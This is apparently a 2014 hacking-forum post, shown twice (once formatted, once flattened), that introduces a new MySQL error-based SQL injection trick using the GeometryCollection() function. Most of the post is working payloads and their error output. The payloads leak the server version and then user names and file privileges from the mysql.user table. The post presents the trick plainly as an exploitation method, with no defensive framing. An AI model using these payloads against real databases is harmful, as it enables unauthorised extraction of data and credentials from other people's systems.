RDot - Показать сообщение отдельно - MySQL: новый Geometric error-based

spari · 29.09.2014, 21:12

Привет!
я не говорю России, так что я собираюсь объяснить это на английском языке.

earlier today, i got some spare time, and played a little with the function GeometryCollection().
basically, this function constructs geometry collection.
sounds nice. but the interesting part is, we can only use it with adjusted function, like point(x,y).
for example-

PHP код:


			
mysql> SELECT GeometryCollection(point(53,12));

and output-

PHP код:


			
+----+---------------------------+

|GeometryCollection(point(53,12))|

|geometry(4294967295)            |

+----+---------------------------+

|??? ??                          |

+----+---------------------------+

as we can see, the output is some gibberish.
now lets try it without POINT()-

PHP код:


			
mysql> SELECT GeometryCollection(53,12);

Error 1367 (22007): Illegal non geometric '53' value found during parsing

wow, wait, what?
we got an error on our x argument, 53.
GeometryCollection() cant process this, because GeometryCollection() dont know how to recognize x,y.
after i saw that, i thought "why stop here?", maybe i can play with this a little more.
so, as expected (

) i tried to pull out the version, like that-

PHP код:


			
mysql> SELECT GeometryCollection(a) from (select version()a)x;

Error 1367 (22007): Illegal non geometric '`x`.`a`'  value found during parsing

mmm.. only possible to see the alias. not good enough.
but wait, if we can see the alias, so maybe NAME_CONST() will do the trick?
well, no. theoretically yes, but the problem is we cant call it.
from here, the way to exploitation was really short-

PHP код:


			
mysql>SELECT GeometryCollection((select*from(select*from(select@@version)f)x));

Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing

and we get a short, new error based, without spaces and commas.
lets try pull out more stuff, maybe some columns from mysql.user-

PHP код:


			
mysql>SELECT GeometryCollection((select*from(select*from(select group_concat(user,file_priv) from mysql.user)f)x));

Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_priv)` from (select 'localhostY,rootY' AS `group_concat(user,file_priv)` from dual) `x`)' value found during parsing

hope i expand your mind

, comments will be nice.

29.09.2014, 21:12	#1
spari Регистрация: 10.09.2012 Сообщений: 46 Репутация: 24	MySQL: новый Geometric error-based Привет! я не говорю России, так что я собираюсь объяснить это на английском языке. earlier today, i got some spare time, and played a little with the function GeometryCollection(). basically, this function constructs geometry collection. sounds nice. but the interesting part is, we can only use it with adjusted function, like point(x,y). for example- PHP код: `mysql> SELECT GeometryCollection(point(53,12));` and output- PHP код: `+----+---------------------------+ \|GeometryCollection(point(53,12))\| \|geometry(4294967295) \| +----+---------------------------+ \|??? ?? \| +----+---------------------------+` as we can see, the output is some gibberish. now lets try it without POINT()- PHP код: `mysql> SELECT GeometryCollection(53,12); Error 1367 (22007): Illegal non geometric '53' value found during parsing` wow, wait, what? we got an error on our x argument, 53. GeometryCollection() cant process this, because GeometryCollection() dont know how to recognize x,y. after i saw that, i thought "why stop here?", maybe i can play with this a little more. so, as expected () i tried to pull out the version, like that- PHP код: mysql> SELECT GeometryCollection(a) from (select version()a)x; Error 1367 (22007): Illegal non geometric '`x`.`a`' value found during parsing mmm.. only possible to see the alias. not good enough. but wait, if we can see the alias, so maybe NAME_CONST() will do the trick? well, no. theoretically yes, but the problem is we cant call it. from here, the way to exploitation was really short- PHP код: mysql>SELECT GeometryCollection((selectfrom(selectfrom(select@@version)f)x)); Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing and we get a short, new error based, without spaces and commas. lets try pull out more stuff, maybe some columns from mysql.user- PHP код: mysql>SELECT GeometryCollection((selectfrom(selectfrom(select group_concat(user,file_priv) from mysql.user)f)x)); Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_priv)` from (select 'localhostY,rootY' AS `group_concat(user,file_priv)` from dual) `x`)' value found during parsing hope i expand your mind , comments will be nice.